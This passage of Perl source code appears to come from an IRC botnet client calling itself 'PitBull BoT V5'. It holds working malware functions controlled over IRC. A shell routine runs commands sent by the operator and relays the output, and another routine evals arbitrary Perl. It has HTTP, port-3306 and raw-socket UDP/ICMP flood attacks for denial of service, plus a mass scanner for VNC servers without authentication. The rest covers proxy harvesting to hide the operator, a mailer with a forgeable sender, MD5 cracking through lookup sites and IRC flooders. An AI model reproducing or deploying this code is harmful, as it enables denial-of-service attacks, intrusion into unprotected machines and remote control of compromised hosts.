elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m/<td align=\"left\" height=17(.*)<\/td>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<td>([A-Z].*)<\/td>/g)
{
push(@ttt1,$1);
}
while ($page =~ m/<td height=17>(.*)<\/td>/g)
{
push(@ttt2,$1);
}
while ($page =~ m/<td>(anonymous|transparent|high anonymity)<\/td>/g)
{
push(@ttt3,$1);
}
foreach $proxyyy (0..(@ttt - 1))
{
if ($ttt3[$proxyyy] =~ /@type/)
{
( my $a, my $ipaddr ) = split( />/, $ttt[$x]);
my $prox="".$ipaddr.":".$ttt2[$proxyyy]."";
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->proxy('http', 'http://'.$prox);
my $response = $ua->get("http://www.google.com/search?q=The_PitBull");
if ($response->is_success)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!");
}
}
}
done;
}
# A simple mailer, @sendmail <subject> <sender> <recipient> <message>
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient");
}
#SQL Fl00dEr
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1.".");
}
#r0xb0t 4.6 VNC ScaNNer by iNs
if ($funcarg =~ /^vnc\s+(.*)/) {
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;
#&ftpcheckm($printl);
my @hosts;
my $MAX_PROCESSES=100;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* ");
$|=1;
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
push(@hosts,$pre.$_);
}
}
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
$pid=fork();
if($pid>0){
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
} elsif(undef $pid) {
# print "fork error\n" if ($DEBUG);
exit(0);
}else{
my($proto,$port);
$0="";
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;
my $port=5900;
print "Connecting to $victim:$port..."; #$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,
PeerPort => $port,
Proto => 'tcp',)) ? print "\n"
: die("\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
#print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "\x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version)
#print("Vulnerable!\n")
: die("\n") ;
exit;
}
}
for(1..$npids){
my $wt=wait();
if($wt==-1){
# print "hey $!\n" if($DEBUG);
redo;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host ");
}
#-#-#-#-#-#-#-#-#
# IRC #
#-#-#-#-#-#-#-#-#
# join a other channel, @join #channel
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
# part a other channel, @part #channel
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
# quit irc, @quit <reason>
if ($funcarg =~ /^quit (.*)/) {
sendraw($IRC_cur_socket, "QUIT ".$1);
}
# voice, @voice <who>
if ($funcarg =~ /^voice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
}
# devoice, @devoice <who>
if ($funcarg =~ /^devoice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
}
# halfop, @halfop <who>
if ($funcarg =~ /^halfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
}
# dehalfop, @dehalfop <who>
if ($funcarg =~ /^dehalfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
}
# op, @op <who>
if ($funcarg =~ /^op (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
}
# deop, @deop <who>
if ($funcarg =~ /^deop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
}
# +Q, @owner <who>
if ($funcarg =~ /^owner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
}
# -Q, @deowner <who>
if ($funcarg =~ /^deowner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
}
#-#-#-#-#-#-#-#-#
# Flooders IRC #
#-#-#-#-#-#-#-#-#
# msg, @msgflood <who>
if ($funcarg =~ /^msgflood (.+?) (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." ");
}
# dccflood, @dccflood <who>
if ($funcarg =~ /^dccflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." ");
}
# ctcpflood, @ctcpflood <who>
if ($funcarg =~ /^ctcpflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." ");
}
# noticeflood, @noticeflood <who>
if ($funcarg =~ /^noticeflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." ");
}
# Channel Flood, @channelflood
if ($funcarg =~ /^channelflood/) {
for($i=0; $i<=25; $i+=1){
sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted ");
}
# Maxi Flood, @maxiflood
if ($funcarg =~ /^maxiflood(.*)/) {
for($i=0; $i<=15; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." ");
}
#-#-#-#-#-#-#-#-#
# DDOS #
#-#-#-#-#-#-#-#-#
#HTTP Flooder
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1.".");
}
# UDP Flooder
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1.".");
}
exit;
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha");
if ($c == "$max_lines") {
$c=0;
sleep $sleeping;
}
}
exit;
}
}
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j {
&join(@_);
}
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_);
}
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub ice(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b><br><br> - (.*?)<br><br><br>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found.");
}}
sub gdata(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.*?)<\/b><\/td>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found.");
}}
sub redn(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<(.*)/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found.");
}}
sub xpz(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt";
my $checker = query($query);
if ($checker =~ m/<b>(.*)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found.");
}}
sub ben(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<string><\!\[CDATA\[(.+?)\]\]><\/string>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found.");
}}
sub alim(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.+?)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found.");
}}
sub cry(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://us.md5.crysm.net/find?md5=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<li>(.+?)<\/li>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found.");
}}
sub query($) {
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") { $query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub fix_url($) {
my $str=$_[0];
if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) {
$set="".$str."";
}
else {
$set="http://".$str."";
}
return $set;
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}